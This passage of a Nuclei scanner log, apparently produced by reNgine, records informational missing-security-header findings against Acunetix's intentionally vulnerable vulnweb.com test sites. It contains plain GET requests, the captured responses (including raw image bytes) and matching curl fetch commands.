topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:42.486596375Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:42.486661646Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:42.771089871Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:42.771069964Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 